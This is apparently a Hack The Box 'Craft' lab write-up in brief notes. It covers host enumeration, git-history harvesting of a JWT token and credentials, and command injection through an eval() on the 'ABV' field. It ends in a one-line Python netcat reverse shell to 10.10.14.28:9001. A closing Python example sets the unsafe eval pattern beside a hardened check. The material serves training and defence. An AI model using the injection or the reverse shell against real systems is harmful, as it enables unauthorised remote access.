craft.md


Hostnames:

  • craft.htb
  • api.craft.htb
  • gogs.craft.htb

craft.htb


api.craft.htb


gogs.craft.htb



API

  • Download API: git -c http.sslVerify=false clone https://gogs.craft.htb/Craft/craft-api.git
  • Open Issues
  • API Token (JWT): X-Craft-API-Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoidXNlciIsImV4cCI6MTU0OTM4NTI0Mn0.-wW1aJkLQDOE-GP5pQd3z_BJTe2Uo0jJ_mQ238P5Dqw
  • Commit: c414b160578943acfe2e158e89409623f41da4c6
  • Closed Issues
  • Commit: 4fd8dbf8422cbf28f8ec96af54f16891dfdd7b95 redirects to a 404.

Analyse the GIT repository

  • Git harvesting: git log
  • A file allows raw SQL commands to be executed.
  • Credentials: dinesh:4aUh0A8PbVJxgd
  • Test Script - commit c414b160578943acfe2e158e89409623f41da4c6
  • Add the found credentials to test.py and execute it.
  • The script confirms the credentials and authenticates the token as valid.
  • Find an execution point in the script that allows command execution (Commit: c414b160578943acfe2e158e89409623f41da4c6). An eval function executes the 'ABV' value. Inject a command using ABV.
  • Executing the script now sends an ICMP request.
  • Modify the script and embed a Python reverse shell.
"__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 9001 >/tmp/f')"

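The eval-on-'ABV' flaw noted above, reduced to its pattern and set beside a hardened check, as an added example that is not code from the craft-api repository or from this write-up. The function names, the CANARY marker, the exact form of the eval expression and the 0 to 1 range for ABV are assumptions made for illustration.

```python
from decimal import Decimal, InvalidOperation

CANARY = []  # constructed marker: records whether supplied text ran as code


def abv_ok_unsafe(abv):
    """Assumed shape of the flawed check: the client-supplied value is
    formatted into an expression string and handed to eval()."""
    return not eval('%s > 1' % abv)


def abv_ok_safe(abv):
    """Hardened check: the value is parsed as data and never evaluated."""
    # JSON booleans are ints in Python; reject them and all non-scalar types.
    if isinstance(abv, bool) or not isinstance(abv, (int, float, str)):
        return False
    try:
        value = Decimal(str(abv))
    except InvalidOperation:
        return False  # anything that is not a plain number ends up here
    # is_finite() rejects NaN and Infinity, which Decimal parses without error.
    return value.is_finite() and Decimal(0) <= value <= Decimal(1)


def demo():
    """Run one constructed, harmless input through both checks."""
    supplied = "CANARY.append('ran') or 0"  # constructed sample input
    CANARY.clear()
    unsafe_verdict = abv_ok_unsafe(supplied)
    ran_under_unsafe = list(CANARY)
    CANARY.clear()
    safe_verdict = abv_ok_safe(supplied)
    ran_under_safe = list(CANARY)
    return unsafe_verdict, ran_under_unsafe, safe_verdict, ran_under_safe


if __name__ == "__main__":
    print(demo())
```

The unsafe check both runs the supplied expression and reports the value as valid, so the request would also pass validation; the hardened check rejects it without executing anything.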